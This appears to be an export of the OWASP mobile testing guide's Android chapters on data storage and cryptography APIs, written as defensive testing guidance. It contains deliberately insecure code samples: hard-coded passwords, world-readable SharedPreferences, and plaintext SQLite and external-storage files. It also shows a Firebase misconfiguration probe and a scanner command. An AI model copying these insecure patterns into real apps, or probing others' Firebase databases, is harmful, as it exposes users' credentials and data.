Sensitive information disclosure risks include potential information decryption, social engineering attacks (if PII is disclosed), account hijacking (if session information or an authentication token is disclosed), and app exploitation with a payment option.
In addition to data protection, validate and sanitize data from any storage source. This includes checking correct data types and implementing cryptographic controls, such as HMACs, for data integrity.
Android offers various data storage methods, tailored to users, developers, and applications. Common persistent storage techniques include:
Additionally, other Android functions that can result in data storage and should be tested include:
Understanding each relevant data storage function is crucial for performing the appropriate test cases. This overview provides a brief outline of these data storage methods and points testers to further relevant documentation.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#shared-preferences","title":"Shared Preferences","text":"The SharedPreferences API is commonly used to permanently save small collections of key-value pairs. Data stored in a SharedPreferences object is written to a plain-text XML file. The SharedPreferences object can be declared world-readable (accessible to all apps) or private. Misuse of the SharedPreferences API can often lead to exposure of sensitive data. Consider the following example:
Example for Java:
SharedPreferences sharedPref = getSharedPreferences(\"key\", MODE_WORLD_READABLE);\nSharedPreferences.Editor editor = sharedPref.edit();\neditor.putString(\"username\", \"administrator\");\neditor.putString(\"password\", \"supersecret\");\neditor.commit();\n
Example for Kotlin:
var sharedPref = getSharedPreferences(\"key\", Context.MODE_WORLD_READABLE)\nvar editor = sharedPref.edit()\neditor.putString(\"username\", \"administrator\")\neditor.putString(\"password\", \"supersecret\")\neditor.commit()\n
Once the activity has been called, the file key.xml will be created with the provided data. This code violates several best practices.
/data/data/<package-name>/shared_prefs/key.xml
.<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n <string name=\"username\">administrator</string>\n <string name=\"password\">supersecret</string>\n</map>\n
MODE_WORLD_READABLE
allows all applications to access and read the contents of key.xml
.root@hermes:/data/data/sg.vp.owasp_mobile.myfirstapp/shared_prefs # ls -la\n-rw-rw-r-- u0_a118 170 2016-04-23 16:51 key.xml\n
Please note that MODE_WORLD_READABLE
and MODE_WORLD_WRITEABLE
were deprecated starting on API level 17. Although newer devices may not be affected by this, applications compiled with an android:targetSdkVersion
value less than 17 may be affected if they run on an OS version that was released before Android 4.2 (API level 17).
The Android platform provides a number of database options as aforementioned in the previous list. Each database option has its own quirks and methods that need to be understood.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#sqlite-database-unencrypted","title":"SQLite Database (Unencrypted)","text":"SQLite is an SQL database engine that stores data in .db
files. The Android SDK has built-in support for SQLite databases. The main package used to manage the databases is android.database.sqlite
. For example, you may use the following code to store sensitive information within an activity:
Example in Java:
SQLiteDatabase notSoSecure = openOrCreateDatabase(\"privateNotSoSecure\", MODE_PRIVATE, null);\nnotSoSecure.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR, Password VARCHAR);\");\nnotSoSecure.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPass');\");\nnotSoSecure.close();\n
Example in Kotlin:
var notSoSecure = openOrCreateDatabase(\"privateNotSoSecure\", Context.MODE_PRIVATE, null)\nnotSoSecure.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR, Password VARCHAR);\")\nnotSoSecure.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPass');\")\nnotSoSecure.close()\n
Once the activity has been called, the database file privateNotSoSecure
will be created with the provided data and stored in the clear text file /data/data/<package-name>/databases/privateNotSoSecure
.
The database's directory may contain several files besides the SQLite database:
Sensitive information should not be stored in unencrypted SQLite databases.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#sqlite-databases-encrypted","title":"SQLite Databases (Encrypted)","text":"With the library SQLCipher, you can password-encrypt SQLite databases.
Example in Java:
SQLiteDatabase secureDB = SQLiteDatabase.openOrCreateDatabase(database, \"password123\", null);\nsecureDB.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR,Password VARCHAR);\");\nsecureDB.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPassEnc');\");\nsecureDB.close();\n
Example in Kotlin:
var secureDB = SQLiteDatabase.openOrCreateDatabase(database, \"password123\", null)\nsecureDB.execSQL(\"CREATE TABLE IF NOT EXISTS Accounts(Username VARCHAR,Password VARCHAR);\")\nsecureDB.execSQL(\"INSERT INTO Accounts VALUES('admin','AdminPassEnc');\")\nsecureDB.close()\n
Secure ways to retrieve the database key include:
Firebase is a development platform with more than 15 products, and one of them is Firebase Real-time Database. It can be leveraged by application developers to store and sync data with a NoSQL cloud-hosted database. The data is stored as JSON and is synchronized in real-time to every connected client and also remains available even when the application goes offline.
A misconfigured Firebase instance can be identified by making the following network call:
https://_firebaseProjectName_.firebaseio.com/.json
The firebaseProjectName can be retrieved from the mobile application by reverse engineering the application. Alternatively, the analysts can use Firebase Scanner, a python script that automates the task above as shown below:
python FirebaseScanner.py -p <pathOfAPKFile>\n\npython FirebaseScanner.py -f <commaSeparatedFirebaseProjectNames>\n
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#realm-databases","title":"Realm Databases","text":"The Realm Database for Java is becoming more and more popular among developers. The database and its contents can be encrypted with a key stored in the configuration file.
//the getKey() method either gets the key from the server or from a KeyStore, or is derived from a password.\nRealmConfiguration config = new RealmConfiguration.Builder()\n .encryptionKey(getKey())\n .build();\n\nRealm realm = Realm.getInstance(config);\n
If the database is not encrypted, you should be able to obtain the data. If the database is encrypted, determine whether the key is hard-coded in the source or resources and whether it is stored unprotected in shared preferences or some other location.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#internal-storage","title":"Internal Storage","text":"You can save files to the device's internal storage. Files saved to internal storage are containerized by default and cannot be accessed by other apps on the device. When the user uninstalls your app, these files are removed. The following code snippets would persistently store sensitive data to internal storage.
Example for Java:
FileOutputStream fos = null;\ntry {\n fos = openFileOutput(FILENAME, Context.MODE_PRIVATE);\n fos.write(test.getBytes());\n fos.close();\n} catch (FileNotFoundException e) {\n e.printStackTrace();\n} catch (IOException e) {\n e.printStackTrace();\n}\n
Example for Kotlin:
var fos: FileOutputStream? = null\nfos = openFileOutput(\"FILENAME\", Context.MODE_PRIVATE)\nfos.write(test.toByteArray(Charsets.UTF_8))\nfos.close()\n
You should check the file mode to make sure that only the app can access the file. You can set this access with MODE_PRIVATE
. Modes such as MODE_WORLD_READABLE
(deprecated) and MODE_WORLD_WRITEABLE
(deprecated) may pose a security risk.
Search for the class FileInputStream
to find out which files are opened and read within the app.
Every Android-compatible device supports shared external storage. This storage may be removable (such as an SD card) or internal (non-removable). Files saved to external storage are world-readable. The user can modify them when USB mass storage is enabled. You can use the following code snippets to persistently store sensitive information to external storage as the contents of the file password.txt
.
Example for Java:
File file = new File (Environment.getExternalFilesDir(), \"password.txt\");\nString password = \"SecretPassword\";\nFileOutputStream fos;\n fos = new FileOutputStream(file);\n fos.write(password.getBytes());\n fos.close();\n
Example for Kotlin:
val password = \"SecretPassword\"\nval path = context.getExternalFilesDir(null)\nval file = File(path, \"password.txt\")\nfile.appendText(password)\n
The file will be created and the data will be stored in a clear text file in external storage once the activity has been called.
It's also worth knowing that files stored outside the application folder (data/data/<package-name>/
) will not be deleted when the user uninstalls the application. Finally, it's worth noting that the external storage can be used by an attacker to allow for arbitrary control of the application in some cases. For more information: see the blog post from Checkpoint.
The Android KeyStore supports relatively secure credential storage. As of Android 4.3 (API level 18), it provides public APIs for storing and using app-private keys. An app can use a public key to create a new private/public key pair for encrypting application secrets, and it can decrypt the secrets with the private key.
You can protect keys stored in the Android KeyStore with user authentication in a confirm credential flow. The user's lock screen credentials (pattern, PIN, password, or fingerprint) are used for authentication.
You can use stored keys in one of two modes:
Users are authorized to use keys for a limited period of time after authentication. In this mode, all keys can be used as soon as the user unlocks the device. You can customize the period of authorization for each key. You can use this option only if the secure lock screen is enabled. If the user disables the secure lock screen, all stored keys will become permanently invalid.
Users are authorized to use a specific cryptographic operation that is associated with one key. In this mode, users must request a separate authorization for each operation that involves the key. Currently, fingerprint authentication is the only way to request such authorization.
The level of security afforded by the Android KeyStore depends on its implementation, which depends on the device. Most modern devices offer a hardware-backed KeyStore implementation: keys are generated and used in a Trusted Execution Environment (TEE) or a Secure Element (SE), and the operating system can't access them directly. This means that the encryption keys themselves can't be easily retrieved, even from a rooted device. You can verify hardware-backed keys with Key Attestation. You can determine whether the keys are inside the secure hardware by checking the return value of the isInsideSecureHardware
method, which is part of the KeyInfo
class.
Note that the relevant KeyInfo indicates that secret keys and HMAC keys are insecurely stored on several devices despite private keys being correctly stored on the secure hardware.
The keys of a software-only implementation are encrypted with a per-user encryption master key. An attacker can access all keys stored on rooted devices that have this implementation in the folder /data/misc/keystore/
. Because the user's lock screen pin/password is used to generate the master key, the Android KeyStore is unavailable when the device is locked. For more security Android 9 (API level 28) introduces the unlockedDeviceRequired
flag. By passing true
to the setUnlockedDeviceRequired
method, the app prevents its keys stored in AndroidKeystore
from being decrypted when the device is locked, and it requires the screen to be unlocked before allowing decryption.
The hardware-backed Android KeyStore gives another layer to defense-in-depth security concept for Android. Keymaster Hardware Abstraction Layer (HAL) was introduced with Android 6 (API level 23). Applications can verify if the key is stored inside the security hardware (by checking if KeyInfo.isinsideSecureHardware
returns true
). Devices running Android 9 (API level 28) and higher can have a StrongBox Keymaster
module, an implementation of the Keymaster HAL that resides in a hardware security module which has its own CPU, secure storage, a true random number generator and a mechanism to resist package tampering. To use this feature, true
must be passed to the setIsStrongBoxBacked
method in either the KeyGenParameterSpec.Builder
class or the KeyProtection.Builder
class when generating or importing keys using AndroidKeystore
. To make sure that StrongBox is used during runtime, check that isInsideSecureHardware
returns true
and that the system does not throw StrongBoxUnavailableException
, which gets thrown if the StrongBox Keymaster isn't available for the given algorithm and key size associated with a key. Description of features on hardware-based keystore can be found on AOSP pages.
Keymaster HAL is an interface to hardware-backed components - Trusted Execution Environment (TEE) or a Secure Element (SE), which is used by Android Keystore. An example of such a hardware-backed component is Titan M.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#key-attestation","title":"Key Attestation","text":"For the applications which heavily rely on Android Keystore for business-critical operations, such as multi-factor authentication through cryptographic primitives, secure storage of sensitive data at the client-side, etc. Android provides the feature of Key Attestation, which helps to analyze the security of cryptographic material managed through Android Keystore. From Android 8.0 (API level 26), the key attestation was made mandatory for all new (Android 7.0 or higher) devices that need to have device certification for Google apps. Such devices use attestation keys signed by the Google hardware Attestation Root certificate and the same can be verified through the key attestation process.
During key attestation, we can specify the alias of a key pair and in return, get a certificate chain, which we can use to verify the properties of that key pair. If the root certificate of the chain is the Google Hardware Attestation Root certificate, and the checks related to key pair storage in hardware are made, it gives an assurance that the device supports hardware-level key attestation, and that the key is in the hardware-backed keystore that Google believes to be secure. Alternatively, if the attestation chain has any other root certificate, then Google does not make any claims about the security of the hardware.
Although the key attestation process can be implemented within the application directly, it is recommended that it should be implemented at the server-side for security reasons. The following are the high-level guidelines for the secure implementation of Key Attestation:
setAttestationChallenge
API with the challenge received from the server and should then retrieve the attestation certificate chain using the KeyStore.getCertificateChain
method.Software
, TrustedEnvironment
or StrongBox
. The client supports hardware-level key attestation if the security level is TrustedEnvironment
or StrongBox
and the attestation certificate chain contains a root certificate signed with the Google attestation root key.Note, if for any reason that process fails, it means that the key is not in security hardware. That does not mean that the key is compromised.
The typical example of Android Keystore attestation response looks like this:
{\n \"fmt\": \"android-key\",\n \"authData\": \"9569088f1ecee3232954035dbd10d7cae391305a2751b559bb8fd7cbb229bd...\",\n \"attStmt\": {\n \"alg\": -7,\n \"sig\": \"304402202ca7a8cfb6299c4a073e7e022c57082a46c657e9e53...\",\n \"x5c\": [\n \"308202ca30820270a003020102020101300a06082a8648ce3d040302308188310b30090603550406130...\",\n \"308202783082021ea00302010202021001300a06082a8648ce3d040302308198310b300906035504061...\",\n \"3082028b30820232a003020102020900a2059ed10e435b57300a06082a8648ce3d040302308198310b3...\"\n ]\n }\n}\n
In the above JSON snippet, the keys have the following meaning:
fmt
: Attestation statement format identifierauthData
: It denotes the authenticator data for the attestationalg
: The algorithm that is used for the Signaturesig
: Signaturex5c
: Attestation certificate chainNote: The sig
is generated by concatenating authData
and clientDataHash
(challenge sent by the server) and signing through the credential private key using the alg
signing algorithm. The same is verified at the server-side by using the public key in the first certificate.
For more understanding on the implementation guidelines, you can refer to Google Sample Code.
For the security analysis perspective, the analysts may perform the following checks for the secure implementation of Key Attestation:
Android 9 (API level 28) adds the ability to import keys securely into the AndroidKeystore
. First, AndroidKeystore
generates a key pair using PURPOSE_WRAP_KEY
, which should also be protected with an attestation certificate. This pair aims to protect the Keys being imported to AndroidKeystore
. The encrypted keys are generated as ASN.1-encoded message in the SecureKeyWrapper
format, which also contains a description of the ways the imported key is allowed to be used. The keys are then decrypted inside the AndroidKeystore
hardware belonging to the specific device that generated the wrapping key, so that they never appear as plaintext in the device's host memory.
Example in Java:
KeyDescription ::= SEQUENCE {\n keyFormat INTEGER,\n authorizationList AuthorizationList\n}\n\nSecureKeyWrapper ::= SEQUENCE {\n wrapperFormatVersion INTEGER,\n encryptedTransportKey OCTET_STRING,\n initializationVector OCTET_STRING,\n keyDescription KeyDescription,\n secureKey OCTET_STRING,\n tag OCTET_STRING\n}\n
The code above presents the different parameters to be set when generating the encrypted keys in the SecureKeyWrapper format. Check the Android documentation on WrappedKeyEntry
for more details.
When defining the KeyDescription AuthorizationList, the following parameters will affect the encrypted keys security:
algorithm
parameter specifies the cryptographic algorithm with which the key is usedkeySize
parameter specifies the size, in bits, of the key, measuring in the normal way for the key's algorithmdigest
parameter specifies the digest algorithms that may be used with the key to perform signing and verification operationsOlder Android versions don't include KeyStore, but they do include the KeyStore interface from JCA (Java Cryptography Architecture). You can use KeyStores that implement this interface to ensure the secrecy and integrity of keys stored with KeyStore; BouncyCastle KeyStore (BKS) is recommended. All implementations are based on the fact that files are stored on the filesystem; all files are password-protected. To create one, use the KeyStore.getInstance(\"BKS\", \"BC\") method
, where \"BKS\" is the KeyStore name (BouncyCastle Keystore) and \"BC\" is the provider (BouncyCastle). You can also use SpongyCastle as a wrapper and initialize the KeyStore as follows: KeyStore.getInstance(\"BKS\", \"SC\")
.
Be aware that not all KeyStores properly protect the keys stored in the KeyStore files.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#storing-a-cryptographic-key-techniques","title":"Storing a Cryptographic Key: Techniques","text":"To mitigate unauthorized use of keys on the Android device, Android KeyStore lets apps specify authorized uses of their keys when generating or importing the keys. Once made, authorizations cannot be changed.
Storing a Key - from most secure to least secure:
/sdcard/
)You can use the hardware-backed Android KeyStore if the device is running Android 7.0 (API level 24) and above with available hardware component (Trusted Execution Environment (TEE) or a Secure Element (SE)). You can even verify that the keys are hardware-backed by using the guidelines provided for the secure implementation of Key Attestation. If a hardware component is not available and/or support for Android 6.0 (API level 23) and below is required, then you might want to store your keys on a remote server and make them available after authentication.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#storing-keys-on-the-server","title":"Storing Keys on the Server","text":"It is possible to securely store keys on a key management server, however the app needs to be online to decrypt the data. This might be a limitation for certain mobile app use cases and should be carefully thought through, as this becomes part of the architecture of the app and might highly impact usability.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#deriving-keys-from-user-input","title":"Deriving Keys from User Input","text":"Deriving a key from a user provided passphrase is a common solution (depending on which Android API level you use), but it also impacts usability, might affect the attack surface and could introduce additional weaknesses.
Each time the application needs to perform a cryptographic operation, the user's passphrase is needed. Either the user is prompted for it every time, which isn't an ideal user experience, or the passphrase is kept in memory as long as the user is authenticated. Keeping the passphrase in memory is not a best-practice, as any cryptographic material must only be kept in memory while it is being used. Zeroing out a key is often a very challenging task as explained in \"Cleaning out Key Material\".
Additionally, consider that keys derived from a passphrase have their own weaknesses. For instance, the passwords or passphrases might be reused by the user or easy to guess. Please refer to the Testing Cryptography chapter for more information.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#cleaning-out-key-material","title":"Cleaning out Key Material","text":"The key material should be cleared out from memory as soon as it is not need anymore. There are certain limitations of reliably cleaning up secret data in languages with garbage collector (Java) and immutable strings (Swift, Objective-C, Kotlin). Java Cryptography Architecture Reference Guide suggests using char[]
instead of String
for storing sensitive data, and nullify array after usage.
Note that some ciphers do not properly clean up their byte-arrays. For instance, the AES Cipher in BouncyCastle does not always clean up its latest working key, leaving some copies of the byte-array in memory. Next, BigInteger based keys (e.g. private keys) cannot be removed from the heap, nor zeroed out without additional effort. Clearing byte array can be achieved by writing a wrapper which implements Destroyable.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#storing-keys-using-android-keystore-api","title":"Storing Keys using Android KeyStore API","text":"A more user-friendly and recommended way is to use the Android KeyStore API system (itself or through KeyChain) to store key material. If it is possible, hardware-backed storage should be used. Otherwise, it should fallback to software implementation of Android Keystore. However, be aware that the AndroidKeyStore
API has been changed significantly throughout versions of Android. In earlier versions, the AndroidKeyStore
API only supported storing public/private key pairs (e.g., RSA). Symmetric key support has only been added since Android 6.0 (API level 23). As a result, a developer needs to handle the different Android API levels to securely store symmetric keys.
In order to securely store symmetric keys on devices running on Android 5.1 (API level 22) or lower, we need to generate a public/private key pair. We encrypt the symmetric key using the public key and store the private key in the AndroidKeyStore
. The encrypted symmetric key can be encoded using base64 and stored in the SharedPreferences
. Whenever we need the symmetric key, the application retrieves the private key from the AndroidKeyStore
and decrypts the symmetric key.
Envelope encryption, or key wrapping, is a similar approach that uses symmetric encryption to encapsulate key material. Data encryption keys (DEKs) can be encrypted with key encryption keys (KEKs) which are securely stored. Encrypted DEKs can be stored in SharedPreferences
or written to files. When required, the application reads the KEK, then decrypts the DEK. Refer to OWASP Cryptographic Storage Cheat Sheet to learn more about encrypting cryptographic keys.
Also, as the illustration of this approach, refer to the EncryptedSharedPreferences from androidx.security.crypto package.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#insecure-options-to-store-keys","title":"Insecure options to store keys","text":"A less secure way of storing encryption keys, is in the SharedPreferences of Android. When SharedPreferences are used, the file is only readable by the application that created it. However, on rooted devices, any other application with root access can read the SharedPreferences file of other apps. This is not the case for the AndroidKeyStore, since AndroidKeyStore access is managed on the kernel level, which needs considerably more work and skill to bypass without the AndroidKeyStore clearing or destroying the keys.
The last three options are to use hardcoded encryption keys in the source code, having a predictable obfuscation function or key derivation function based on stable attributes, and storing generated keys in public places like /sdcard/
. Hardcoded encryption keys are an issue, since this means every instance of the application uses the same encryption key. An attacker can reverse-engineer a local copy of the application to extract the cryptographic key, and use that key to decrypt any data which was encrypted by the application on any device.
Next, when you have a predictable key derivation function based on identifiers which are accessible to other applications, the attacker only needs to find the KDF and apply it to the device to find the key. Lastly, storing encryption keys publicly is also highly discouraged, as other applications can have permission to read the public partition and steal the keys.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#data-encryption-using-third-party-libraries","title":"Data Encryption Using Third Party Libraries","text":"There are several different open-source libraries that offer encryption capabilities specific to the Android platform.
Please keep in mind that as long as the key is not stored in the KeyStore, it is always possible to easily retrieve the key on a rooted device and then decrypt the values you are trying to protect.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#keychain","title":"KeyChain","text":"The KeyChain class is used to store and retrieve system-wide private keys and their corresponding certificates (chain). The user will be prompted to set a lock screen pin or password to protect the credential storage if something is being imported into the KeyChain for the first time. Note that the KeyChain is system-wide, every application can access the materials stored in the KeyChain.
Inspect the source code to determine whether native Android mechanisms identify sensitive information. Sensitive information should be encrypted, not stored in clear text. For sensitive information that must be stored on the device, several API calls are available to protect the data via the KeyChain
class. Complete the following steps:
AndroidKeystore
, import java.security.KeyStore
, import javax.crypto.Cipher
, import java.security.SecureRandom
, and corresponding usages.store(OutputStream stream, char[] password)
function to store the KeyStore to disk with a password. Make sure that the password is provided by the user, not hard-coded.There are many legitimate reasons to create log files on a mobile device, such as keeping track of crashes, errors, and usage statistics. Log files can be stored locally when the app is offline and sent to the endpoint once the app is online. However, logging sensitive data may expose the data to attackers or malicious applications, and it might also violate user confidentiality. You can create log files in several ways. The following list includes two classes that are available for Android:
Android provides users with an auto-backup feature. The backups usually include copies of data and settings for all installed apps. Given its diverse ecosystem, Android supports many backup options:
Stock Android has built-in USB backup facilities. When USB debugging is enabled, use the adb backup
command to create full data backups and backups of an app's data directory.
Google provides a \"Back Up My Data\" feature that backs up all app data to Google's servers.
Two Backup APIs are available to app developers:
Key/Value Backup (Backup API or Android Backup Service) uploads to the Android Backup Service cloud.
Auto Backup for Apps: With Android 6.0 (API level 23) and above, Google added the \"Auto Backup for Apps feature\". This feature automatically syncs at most 25MB of app data with the user's Google Drive account.
OEMs may provide additional options. For example, HTC devices have a \"HTC Backup\" option that performs daily backups to the cloud when activated.
Apps must carefully ensure that sensitive user data doesn't end within these backups as this may allow an attacker to extract it.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#adb-backup-support","title":"ADB Backup Support","text":"Android provides an attribute called allowBackup
to back up all your application data. This attribute is set in the AndroidManifest.xml
file. If the value of this attribute is true, the device allows users to back up the application with Android Debug Bridge (ADB) via the command $ adb backup
.
To prevent the app data backup, set the android:allowBackup
attribute to false. When this attribute is unavailable, the allowBackup setting is enabled by default, and backup must be manually deactivated.
Note: If the device was encrypted, then the backup files will be encrypted as well.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#process-memory","title":"Process Memory","text":"All applications on Android use memory to perform normal computational operations like any regular modern-day computer. It is of no surprise then that at times sensitive operations will be performed within process memory. For this reason, it is important that once the relevant sensitive data has been processed, it should be disposed from process memory as quickly as possible.
The investigation of an application's memory can be done from memory dumps, and from analyzing the memory in real time via a debugger.
For an overview of possible sources of data exposure, check the documentation and identify application components before you examine the source code. For example, sensitive data from a backend may be in the HTTP client, the XML parser, etc. You want all these copies to be removed from memory as soon as possible.
In addition, understanding the application's architecture and the architecture's role in the system will help you identify sensitive information that doesn't have to be exposed in memory at all. For example, assume your app receives data from one server and transfers it to another without any processing. That data can be handled in an encrypted format, which prevents exposure in memory.
However, if you need to expose sensitive data in memory, you should make sure that your app is designed to expose as few data copies as possible as briefly as possible. In other words, you want the handling of sensitive data to be centralized (i.e., with as few components as possible) and based on primitive, mutable data structures.
The latter requirement gives developers direct memory access. Make sure that they use this access to overwrite the sensitive data with dummy data (typically zeroes). Examples of preferable data types include byte []
and char []
, but not String
or BigInteger
. Whenever you try to modify an immutable object like String
, you create and change a copy of the object.
Using non-primitive mutable types like StringBuffer
and StringBuilder
may be acceptable, but it's indicative and requires care. Types like StringBuffer
are used to modify content (which is what you want to do). To access such a type's value, however, you would use the toString
method, which would create an immutable copy of the data. There are several ways to use these data types without creating an immutable copy, but they require more effort than using a primitive array. Safe memory management is one benefit of using types like StringBuffer
, but this can be a two-edged sword. If you try to modify the content of one of these types and the copy exceeds the buffer capacity, the buffer size will automatically increase. The buffer content may be copied to a different location, leaving the old content without a reference use to overwrite it.
Unfortunately, few libraries and frameworks are designed to allow sensitive data to be overwritten. For example, destroying a key, as shown below, doesn't remove the key from memory:
Example in Java:
SecretKey secretKey = new SecretKeySpec(\"key\".getBytes(), \"AES\");\nsecretKey.destroy();\n
Example in Kotlin:
val secretKey: SecretKey = SecretKeySpec(\"key\".toByteArray(), \"AES\")\nsecretKey.destroy()\n
Overwriting the backing byte-array from secretKey.getEncoded
doesn't remove the key either; the SecretKeySpec-based key returns a copy of the backing byte-array. See the sections below for the proper way to remove a SecretKey
from memory.
The RSA key pair is based on the BigInteger
type and therefore resides in memory after its first use outside the AndroidKeyStore
. Some ciphers (such as the AES Cipher
in BouncyCastle
) do not properly clean up their byte-arrays.
User-provided data (credentials, social security numbers, credit card information, etc.) is another type of data that may be exposed in memory. Regardless of whether you flag it as a password field, EditText
delivers content to the app via the Editable
interface. If your app doesn't provide Editable.Factory
, user-provided data will probably be exposed in memory for longer than necessary. The default Editable
implementation, the SpannableStringBuilder
, causes the same issues as Java's StringBuilder
and StringBuffer
cause (discussed above).
The features provided by third-party services can involve tracking services to monitor the user's behavior while using the app, selling banner advertisements, or improving the user experience.
The downside is that developers don't usually know the details of the code executed via third-party libraries. Consequently, no more information than is necessary should be sent to a service, and no sensitive information should be disclosed.
Most third-party services are implemented in two ways:
At certain points in time, the user will have to enter sensitive information into the application. This data may be financial information such as credit card data or user account passwords, or maybe healthcare data. The data may be exposed if the app doesn't properly mask it while it is being typed.
In order to prevent disclosure and mitigate risks such as shoulder surfing you should verify that no sensitive data is exposed via the user interface unless explicitly required (e.g. a password being entered). For the data required to be present it should be properly masked, typically by showing asterisks or dots instead of clear text.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#screenshots","title":"Screenshots","text":"Manufacturers want to provide device users with an aesthetically pleasing experience at application startup and exit, so they introduced the screenshot-saving feature for use when the application is backgrounded. This feature may pose a security risk. Sensitive data may be exposed if the user deliberately screenshots the application while sensitive data is displayed. A malicious application that is running on the device and able to continuously capture the screen may also expose data. Screenshots are written to local storage, from which they may be recovered by a rogue application (if the device is rooted) or someone who has stolen the device.
For example, capturing a screenshot of a banking application may reveal information about the user's account, credit, transactions, and so on.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#app-notifications","title":"App Notifications","text":"It is important to understand that notifications should never be considered private. When a notification is handled by the Android system it is broadcasted system-wide and any application running with a NotificationListenerService can listen for these notifications to receive them in full and may handle them however it wants.
There are many known malware samples such as Joker, and Alien which abuses the NotificationListenerService
to listen for notifications on the device and then send them to attacker-controlled C2 infrastructure. Commonly this is done to listen for two-factor authentication (2FA) codes that appear as notifications on the device which are then sent to the attacker. A safer alternative for the user would be to use a 2FA application that does not generate notifications.
Furthermore there are a number of apps on the Google Play Store that provide notification logging, which logs locally any notifications on the Android system. This highlights that notifications are in no way private on Android and accessible by any other app on the device.
For this reason all notification usage should be inspected for confidential or high risk information that could be used by malicious applications.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#keyboard-cache","title":"Keyboard Cache","text":"When users enter information in input fields, the software automatically suggests data. This feature can be very useful for messaging apps. However, the keyboard cache may disclose sensitive information when the user selects an input field that takes this type of information.
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/","title":"Android Cryptographic APIs","text":""},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#overview","title":"Overview","text":"In the chapter \"Mobile App Cryptography\", we introduced general cryptography best practices and described typical issues that can occur when cryptography is used incorrectly. In this chapter, we'll go into more detail on Android's cryptography APIs. We'll show how to identify usage of those APIs in the source code and how to interpret cryptographic configurations. When reviewing code, make sure to compare the cryptographic parameters used with the current best practices, as linked in this guide.
We can identify key components of cryptography system on Android:
Android cryptography APIs are based on the Java Cryptography Architecture (JCA). JCA separates the interfaces and implementation, making it possible to include several security providers that can implement sets of cryptographic algorithms. Most of the JCA interfaces and classes are defined in the java.security.*
and javax.crypto.*
packages. In addition, there are Android specific packages android.security.*
and android.security.keystore.*
.
KeyStore and KeyChain provide APIs for storing and using keys (behind the scene, KeyChain API uses KeyStore system). These systems allow to administer the full lifecycle of the cryptographic keys. Requirements and guidance for implementation of cryptographic key management can be found in Key Management Cheat Sheet. We can identify following phases:
Please note that storing of a key is analyzed in the chapter \"Testing Data Storage\".
These phases are managed by the Keystore/KeyChain system. However how the system works depends on how the application developer implemented it. For the analysis process you should focus on functions which are used by the application developer. You should identify and verify the following functions:
Apps that target modern API levels, went through the following changes:
Crypto
provider has dropped and the provider is deprecated. The same applies to its SHA1PRNG
for secure random.AndroidOpenSSL
, is preferred above using Bouncy Castle and it has new implementations: AlgorithmParameters:GCM
, KeyGenerator:AES
, KeyGenerator:DESEDE
, KeyGenerator:HMACMD5
, KeyGenerator:HMACSHA1
, KeyGenerator:HMACSHA224
, KeyGenerator:HMACSHA256
, KeyGenerator:HMACSHA384
, KeyGenerator:HMACSHA512
, SecretKeyFactory:DESEDE
, and Signature:NONEWITHECDSA
.IvParameterSpec.class
anymore for GCM, but use the GCMParameterSpec.class
instead.OpenSSLSocketImpl
to ConscryptFileDescriptorSocket
, and ConscryptEngineSocket
.SSLSession
with null parameters give a NullPointerException
.InvalidKeySpecException
is thrown.SocketException
.getInstance
method and you target any API below 28. If you target Android 9 (API level 28) or above, you get an error.Crypto
security provider is now removed. Calling it will result in a NoSuchProviderException
.The following list of recommendations should be considered during app examination:
SHA1PRNG
as they are deprecated.Android relies on the java.security.Provider
class to implement Java Security services. These providers are crucial to ensure secure network communications and secure other functionalities which depend on cryptography.
The list of security providers included in Android varies between versions of Android and the OEM-specific builds. Some security provider implementations in older versions are now known to be less secure or vulnerable. Thus, Android applications should not only choose the correct algorithms and provide a good configuration, in some cases they should also pay attention to the strength of the implementations in the legacy security providers.
You can list the set of existing security providers using following code:
StringBuilder builder = new StringBuilder();\nfor (Provider provider : Security.getProviders()) {\n builder.append(\"provider: \")\n .append(provider.getName())\n .append(\" \")\n .append(provider.getVersion())\n .append(\"(\")\n .append(provider.getInfo())\n .append(\")\\n\");\n}\nString providers = builder.toString();\n//now display the string on the screen or in the logs for debugging.\n
This is the output for Android 9 (API level 28) running in an emulator with Google Play APIs:
provider: AndroidNSSP 1.0(Android Network Security Policy Provider)\nprovider: AndroidOpenSSL 1.0(Android's OpenSSL-backed security provider)\nprovider: CertPathProvider 1.0(Provider of CertPathBuilder and CertPathVerifier)\nprovider: AndroidKeyStoreBCWorkaround 1.0(Android KeyStore security provider to work around Bouncy Castle)\nprovider: BC 1.57(BouncyCastle Security Provider v1.57)\nprovider: HarmonyJSSE 1.0(Harmony JSSE Provider)\nprovider: AndroidKeyStore 1.0(Android KeyStore security provider)\n
"},{"location":"MASTG/Android/0x05e-Testing-Cryptography/#updating-security-provider","title":"Updating security provider","text":"Keeping up-to-date and patched component is one of security principles. The same applies to provider
. Application should check if used security provider is up-to-date and if not, update it.
